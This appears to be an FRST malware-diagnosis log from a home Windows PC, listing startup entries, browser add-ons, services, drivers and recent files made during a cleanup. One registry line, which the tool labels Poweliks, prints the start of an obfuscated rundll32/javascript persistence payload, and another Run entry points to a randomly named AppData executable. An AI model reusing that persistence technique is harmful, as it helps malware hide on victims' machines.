(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SoftwareDistribution\SelfUpdate\Handler\wusetupv.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13191312 2012-08-07] (Realtek Semiconductor)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll",TrayApp
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2862448 2012-08-05] (ELAN Microelectronics Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [97392 2012-08-15] (CyberLink Corp.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40312 2014-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [2994880 2012-08-14] (Symantec Corporation)
HKLM-x32\...\Run: [Intel AppUp(SM) center] => C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe [156000 2012-09-18] (Intel Corporation)
HKLM-x32\...\Run: [Intel AppUp® center] => C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe [156000 2012-09-18] (Intel Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-01-21] (Microsoft Corporation)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM-x32\...\Run: [TrojanScanner] => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [1666432 2014-05-22] (Simply Super Software)
Winlogon\Notify\igfxcui: C:\windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [googletalk] => C:\Users\Stephen\AppData\Roaming\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [GoogleChromeAutoLaunch_7658F97A8AE129BDD15C9751079A5083] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [860488 2014-08-06] (Google Inc.)
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [21653096 2014-07-24] (Skype Technologies S.A.)
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [Dailtyqovoyxivw] => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ShareOverlay -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
ShellIconOverlayIdentifiers-x32: ShareOverlay -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.conduit.com?SearchSource=10&CUI=UN47387223475202034&UM=2&ctid=CT3289663
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://samsung13.msn.com
SearchScopes: HKLM - DefaultScope {26D065C0-FDE5-43C3-A19F-E60724A2F11B} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASMJS
SearchScopes: HKLM - {26D065C0-FDE5-43C3-A19F-E60724A2F11B} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASMJS
SearchScopes: HKLM-x32 - DefaultScope {01B8D119-40DC-43D4-9D14-59FB6904AF1A} URL = 
SearchScopes: HKLM-x32 - {26D065C0-FDE5-43C3-A19F-E60724A2F11B} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASMJS
SearchScopes: HKCU - DefaultScope {01B8D119-40DC-43D4-9D14-59FB6904AF1A} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3289663&CUI=UN47387223475202034&UM=2
SearchScopes: HKCU - {26D065C0-FDE5-43C3-A19F-E60724A2F11B} URL = 
BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_64.dll (IvoSoft)
BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_32.dll (IvoSoft)
Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 71.252.0.12
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\Program Files\Microsoft Office\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: intel.com/AppUp -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp.dll (Intel)
FF Plugin HKCU: intel.com/AppUpx64 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll (Intel)
FF Plugin HKCU: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn [2014-08-23]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFFPlgn
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFFPlgn [2012-12-27]
 
Chrome: 
=======
CHR HomePage: hxxp://samsung13.msn.com/
CHR StartupUrls: "hxxp://www.google.com/"
CHR NewTab: "chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\pdf.dll ()
CHR Extension: (Duolingo) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\aiahmijlpehemcpleichkcokhegllfjl [2013-09-01]
CHR Extension: (Xmarks Bookmark Sync) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajpgkpeckebdhofmmjfgcjjiiejpodla [2012-12-29]
CHR Extension: (Google Drive) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-27]
CHR Extension: (Norton Security Toolbar) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\bejnhdlplbjhffionohbdnpcbobfejcc [2014-05-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23]
CHR Extension: (YouTube) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-12-27]
CHR Extension: (Linkification) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\cflchafndefoljnhhholeekfpgmbphaf [2012-12-29]
CHR Extension: (Google Search) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-27]
CHR Extension: (GameWeasel) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\emhdohhdhpcobeiikcekeioeonmedanp [2012-12-29]
CHR Extension: (Marlies Dekkers) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\fepnljgdbelppefncogilfbjikmnbhjm [2012-12-29]
CHR Extension: (TweetDeck by Twitter) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\hbdpomandigafcibbmofojjchbcdagbl [2012-12-29]
CHR Extension: (Feedly - News, Blogs and Youtube) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipbfijinpcgfogaopmgehiegacbhmob [2013-04-18]
CHR Extension: (Kindle Cloud Reader) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\icdipabjmbhpdkjaihfjoikhjjeneebd [2013-05-26]
CHR Extension: (Vigenère cipher) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\jefmgpafeddooefhpnhccodndbcpbmhj [2014-08-14]
CHR Extension: (Speed Dial 2) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2012-12-29]
CHR Extension: (WordPress.com) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\khjnjifipfkgglficmipimgjpbmlbemd [2012-12-29]
CHR Extension: (Download Master) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcceagdollnkjlogmdckgjakjapmkdjf [2012-12-29]
CHR Extension: (SoundCloud mp3 Download) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\mlinbfdlnkjpimeeeeodegeibkkekboe [2013-12-11]
CHR Extension: (Text to Image) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanbapcfdoomkfoomlmiaaflmkaiiedd [2012-12-29]
CHR Extension: (Google Wallet) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-25]
CHR Extension: (Gmail) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-27]
CHR Extension: (WordPress.com Extension) - C:\Users\Stephen\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnbbfhcegldppmibabepjfjloachnmjb [2012-12-29]
CHR HKCU\...\Chrome\Extension: [nemfjadlboooiffmcelkafilagddogim] - C:\Users\Stephen\AppData\Local\CRE\nemfjadlboooiffmcelkafilagddogim.crx [2013-06-09]
CHR HKLM-x32\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\Exts\Chrome.crx [2014-05-01]
CHR HKLM-x32\...\Chrome\Extension: [nemfjadlboooiffmcelkafilagddogim] - C:\Users\Stephen\AppData\Local\CRE\nemfjadlboooiffmcelkafilagddogim.crx [2013-06-09]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ClassicShellService; C:\Program Files\Classic Shell\ClassicShellService.exe [68608 2012-12-29] (IvoSoft) [File not signed]
R2 Easy Launcher; C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe [1593976 2012-09-05] (Samsung Electronics CO., LTD.)
R2 ExpressCache; C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe [102224 2012-08-17] (Condusiv Technologies)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 irstrtsv; C:\windows\SysWOW64\irstrtsv.exe [193576 2012-07-19] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273136 2013-08-28] ()
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe [144368 2013-05-21] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [3943104 2012-08-14] (Symantec Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [14920 2013-01-28] (Microsoft Corporation)
R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [619904 2012-12-11] (Wacom Technology, Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3378416 2013-08-28] (Intel® Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\BASHDefs\20130208.001\BHDrvx64.sys [1388120 2013-01-15] (Symantec Corporation)
R3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [202752 2012-07-25] (Microsoft Corporation)
R1 ccSet_NARA; C:\Windows\system32\drivers\NARAx64\0401000.00E\ccSetx64.sys [168608 2012-05-25] (Symantec Corporation)
R3 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1405000.01C\ccSetx64.sys [169048 2013-04-15] (Symantec Corporation)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [484512 2013-02-11] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [138912 2012-12-27] (Symantec Corporation)
R1 excfs; C:\Windows\System32\DRIVERS\excfs.sys [23376 2012-08-17] (Condusiv Technologies)
R0 excsd; C:\Windows\System32\DRIVERS\excsd.sys [103248 2012-08-17] (Condusiv Technologies)
R3 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\IPSDefs\20130222.001\IDSvia64.sys [513184 2012-12-26] (Symantec Corporation)
R3 irstrtdv; C:\Windows\System32\drivers\irstrtdv.sys [43800 2012-07-20] (Intel Corporation)
S3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20130223.009\ENG64.SYS [126192 2013-02-11] (Symantec Corporation)
S3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20130223.009\EX64.SYS [2087664 2013-02-11] (Symantec Corporation)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3345376 2013-10-08] (Intel Corporation)
R3 RadioHIDMini; C:\Windows\System32\drivers\RadioHIDMini.sys [23408 2012-07-27] (Windows ® Win 7 DDK provider)
S3 rtport; C:\windows\SysWOW64\drivers\rtport.sys [15144 2012-11-28] (Windows ® 2003 DDK 3790 provider)
S3 SRTSP; C:\Windows\System32\Drivers\NISx64\1405000.01C\SRTSP64.SYS [796760 2013-05-16] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NISx64\1405000.01C\SRTSPX64.SYS [36952 2013-03-04] (Symantec Corporation)
R3 SymDS; C:\Windows\system32\drivers\NISx64\1405000.01C\SYMDS64.SYS [493656 2013-05-21] (Symantec Corporation)
R3 SymEFA; C:\Windows\system32\drivers\NISx64\1405000.01C\SYMEFA64.SYS [1139800 2013-05-23] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NISx64\1405000.01C\SymELAM.sys [23448 2012-06-20] (Symantec Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2013-06-18] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NISx64\1405000.01C\Ironx64.SYS [224416 2013-03-04] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NISx64\1405000.01C\SYMNETS.SYS [433752 2013-04-24] (Symantec Corporation)
S3 SBIOSIO; \??\C:\Windows\Temp\SBIOSIO64.SYS [X]
S3 TVICPORT; \??\C:\windows\system32\DRIVERS\TVICPORT.SYS [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-23 13:40 - 2014-08-23 13:41 - 00025551 _____ () C:\Users\Stephen\Desktop\FRST.txt
2014-08-23 13:39 - 2014-08-23 13:40 - 00000000 ____D () C:\FRST
2014-08-23 13:39 - 2014-08-23 13:39 - 02103296 _____ (Farbar) C:\Users\Stephen\Downloads\FRST64.exe
2014-08-23 13:26 - 2014-08-23 13:27 - 00290576 _____ () C:\windows\Minidump\082314-36093-01.dmp
2014-08-23 13:25 - 2014-08-23 13:25 - 00002560 _____ () C:\Users\Stephen\AppData\Local\A09170451A.exe
2014-08-23 13:24 - 2014-08-23 13:24 - 02103296 _____ (Farbar) C:\Users\Stephen\Desktop\FRST64.exe
2014-08-23 12:58 - 2014-08-23 12:58 - 00005244 _____ () C:\Users\Stephen\Desktop\attach.txt
2014-08-23 12:58 - 2014-08-23 12:57 - 00015909 _____ () C:\Users\Stephen\Desktop\dds.txt
2014-08-23 12:38 - 2014-08-23 12:38 - 00000000 ___SH () C:\DkHyperbootSync
2014-08-23 12:29 - 2014-08-23 12:31 - 00688992 ____R (Swearware) C:\Users\Stephen\Downloads\dds (1).com
2014-08-23 12:29 - 2014-08-23 12:31 - 00688992 _____ (Swearware) C:\Users\Stephen\Downloads\dds.com
2014-08-23 11:43 - 2013-03-05 19:07 - 00692568 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerApp.exe
2014-08-23 11:43 - 2013-03-05 19:07 - 00078168 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-08-23 11:17 - 2014-08-23 11:17 - 00430728 _____ () C:\windows\system32\FNTCACHE.DAT
2014-08-23 09:08 - 2014-08-23 09:08 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel PROSet Wireless
2014-08-23 09:08 - 2014-08-23 09:08 - 00000000 ____D () C:\Program Files (x86)\Cisco
2014-08-23 09:07 - 2014-08-23 09:08 - 00000000 ____D () C:\ProgramData\Intel.sav
2014-08-22 20:11 - 2014-01-19 03:38 - 00270496 ____N (Microsoft Corporation) C:\windows\system32\MpSigStub.exe
2014-08-22 16:16 - 2013-08-07 01:15 - 00144896 _____ (Microsoft Corporation) C:\windows\system32\tssdisai.dll
2014-08-22 14:40 - 2014-08-22 14:40 - 00007605 _____ () C:\Users\Stephen\AppData\Local\Resmon.ResmonCfg
2014-08-22 12:39 - 2014-08-23 13:26 - 580607022 _____ () C:\windows\MEMORY.DMP
2014-08-22 12:39 - 2014-08-22 12:40 - 00286552 _____ () C:\windows\Minidump\082214-25421-01.dmp
2014-08-22 12:38 - 2014-08-22 12:38 - 00002560 _____ () C:\Users\Stephen\AppData\Local\53534DF0.exe
2014-08-22 09:01 - 2014-08-22 09:01 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-08-22 08:53 - 2014-08-22 08:53 - 02347384 _____ (ESET) C:\Users\Stephen\Desktop\esetsmartinstaller_enu.exe
2014-08-22 04:00 - 2014-08-22 04:27 - 00002146 _____ () C:\Users\Stephen\Desktop\Rkill.txt
2014-08-22 04:00 - 2014-08-22 04:00 - 01063160 _____ (Bleeping Computer, LLC) C:\Users\Stephen\Downloads\rkill64-2137.exe
2014-08-22 03:51 - 2014-08-22 03:53 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Stephen\Downloads\rkill.exe
2014-08-22 02:58 - 2014-08-22 02:59 - 00000000 ____D () C:\Users\Stephen\Desktop\New folder (4)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder (3)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder (2)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder
2014-08-22 01:34 - 2014-08-22 01:35 - 00910000 _____ () C:\Users\Stephen\Downloads\MicrosoftSystemScan_db9dee88-9091-4047-a2a0-bf19e4fd7a5d.exe
2014-08-22 01:25 - 2014-05-14 21:02 - 00059424 _____ (Microsoft Corporation) C:\windows\system32\wuauclt.exe
2014-08-22 01:25 - 2014-05-14 18:43 - 03286528 _____ (Microsoft Corporation) C:\windows\system32\wuaueng.dll
2014-08-22 01:25 - 2014-05-14 18:43 - 01623040 _____ (Microsoft Corporation) C:\windows\system32\wucltux.dll
2014-08-22 01:25 - 2014-05-14 18:43 - 00253440 _____ () C:\windows\system32\WUSettingsProvider.dll
2014-08-22 01:25 - 2014-05-14 18:42 - 00176640 _____ (Microsoft Corporation) C:\windows\system32\storewuauth.dll
2014-08-22 01:21 - 2013-08-16 01:21 - 00049152 _____ (Microsoft Corporation) C:\windows\system32\wups2.dll
2014-08-21 19:00 - 2014-08-21 19:00 - 00002776 _____ () C:\windows\System32\Tasks\CCleanerSkipUAC
2014-08-21 19:00 - 2014-08-21 19:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-08-21 18:59 - 2014-08-21 19:00 - 00000000 ____D () C:\Program Files\CCleaner
2014-08-21 18:40 - 2014-08-21 18:41 - 04813544 _____ (Piriform Ltd) C:\Users\Stephen\Downloads\ccsetup416.exe
2014-08-21 16:08 - 2014-08-21 16:10 - 00000000 ____D () C:\NPE
2014-08-21 16:01 - 2014-08-21 17:28 - 00000000 ____D () C:\Users\Stephen\AppData\Local\NPE
2014-08-21 15:58 - 2014-08-21 16:01 - 03077584 ____N (Symantec Corporation) C:\Users\Stephen\Downloads\npe.exe
2014-08-21 13:06 - 2014-08-21 13:06 - 00000000 _____ () C:\Users\Stephen\Downloads\FixNecurs64bit.log
2014-08-21 13:04 - 2014-08-21 13:05 - 05818744 _____ (Symantec Corporation) C:\Users\Stephen\Downloads\FixNecurs64bit.exe
2014-08-21 13:03 - 2014-08-21 13:03 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Stephen\Downloads\tdsskiller.exe
2014-08-21 13:02 - 2014-08-21 13:02 - 00277328 _____ (ESET) C:\Users\Stephen\Downloads\ESETZBotZRCleaner.exe
2014-08-21 12:40 - 2014-08-21 12:40 - 00000000 ____D () C:\Users\Stephen\Documents\Simply Super Software
2014-08-21 12:40 - 2014-08-21 12:40 - 00000000 ____D () C:\ProgramData\Licenses
2014-08-21 12:38 - 2014-08-21 12:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover
